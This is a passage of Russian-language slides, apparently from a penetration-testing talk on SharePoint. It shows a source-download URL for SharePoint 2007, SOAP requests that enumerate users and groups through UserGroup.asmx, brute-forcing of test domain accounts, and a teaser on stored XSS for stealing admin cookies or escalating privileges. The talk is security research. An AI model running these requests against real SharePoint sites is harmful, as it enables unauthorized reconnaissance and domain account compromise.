Мои последние исселодования показали, что у SharePoint есть определенное количество вэб сервисов, которые могут помочь аудитору собрать крайне полезную информацию с сайта (списки пользователей, групп, ролей и т д). Также данные сервисы, в комбинации с хранимыми XSS, могут быть использованы для вертикального повышения привилегий или предоставить информацию для компрометации доменных записей AD.
5. ОСНОВНЫЕ КОМПОНЕНТЫ SHAREPOINT
5
ВЕБ-ПРИЛОЖЕНИЯ для организации совместной работы
ФУНКЦИОНАЛЬНОСТЬ для создания веб-порталов
ПОИСК ИНФОРМАЦИИ в документах и информационных системах
УПРАВЛЕНИЕ РАБОЧИМИ ПРОЦЕССАМИ и содержимым масштаба предприятия
БИЗНЕС-АНАЛИЗ
6. 6
Google
hacking
ОБЩЕЕ ОПИСАНИЕ УЯЗВИМОСТЕЙ
ЗАКРЫТЫЕ ДЕТАЛИ
НЕБОЛЬШОЕ КОЛИЧЕСТВО ПУБЛИЧНЫХ ЭКСПЛОЙТОВ
7. УЯЗВИМОСТЬ
ЗАГРУЗКИ
ИСХОДНЫХ
КОДОВ ASPX
СТРАНИЦ
7
• Работает только в SharePoint 2007
• Необходимо знать адрес конкретной страницы
• Основной интерес представляют страницы написанные
разработчиками сайта
h-p://www.example.com/_layouts/download.aspx?SourceUrl=/Pages/
Default.aspx&Source=h-p://www.example.com/Pages/
Default.aspx&FldUrl=
11. НЕДОСТАТКИ
СТАРОГО
СПОСОБА
11
• Необходимо инкрементировать ID
• Не всегда есть доступ к просмотру
• Можно попасть в группу
• Самый большой ID не известен
• NTLM или Kerberos авторизация при автоматизации
• Парсинг данных при автоматизации
• Что делать если их “over 9000”?????
12. ОТ ТЕОРИИ К
ПРАКТИКЕ
POST /sites/testsite1/_vti_bin/UserGroup.asmx HTTP/1.1
Host: host
[…]
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUserCollectionFromSite xmlns="http://
schemas.microsoft.com/sharepoint/soap/directory/" />
</soap:Body>
</soap:Envelope>
12
15. GREP “TEST”
МНОГО ДОМЕНОВ, МНОГО ПОЛЬЗОВАТЕЛЕЙ, МНОГО ВОЗМОЖНОСТЕЙ
15
16. DUMMY BRUTE
LEADS TO PWN
• Захвачена тестовая доменная учетная запись
• Повышена сложность обнаружения злоумышленника
• Разные тестовые учетные записи могут содержать разные
права доступа к сайту
• Приведен пример из боевого проекта, получен аккаунт из
домена крупного российского банка
16
17. DEER HUNTING
Для поиска интересного аккаунта помимо тестового
перечисляем список групп и узнаем в какой группе
находится наша “жертва”
17
18. ПОЛУЧАЕМ
СПИСОК ГРУПП
POST /_vti_bin/UserGroup.asmx HTTP/1.1
Host: host
[…]
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetGroupCollectionFromSite xmlns="http://
schemas.microsoft.com/sharepoint/soap/directory/" />
</soap:Body>
</soap:Envelope>
18
список групп на разных сайтах
в рамках одного домена может
различаться
22. НАХОДИШЬ ХРАНИМЫЕ XSS НА ЛЮБОМ САЙТЕ?
ИНТЕРЕСНО ЛИ КРАСТЬ АДМИНСКИЕ КУКИ?
МОЖЕМ ЛИ МЫ ИХ УКРАСТЬ?
ЗАЧЕМ КРАСТЬ СЕССИЮ АДМИНА, КОГДА
МОЖНО СТАТЬ АДМИНОМ?
22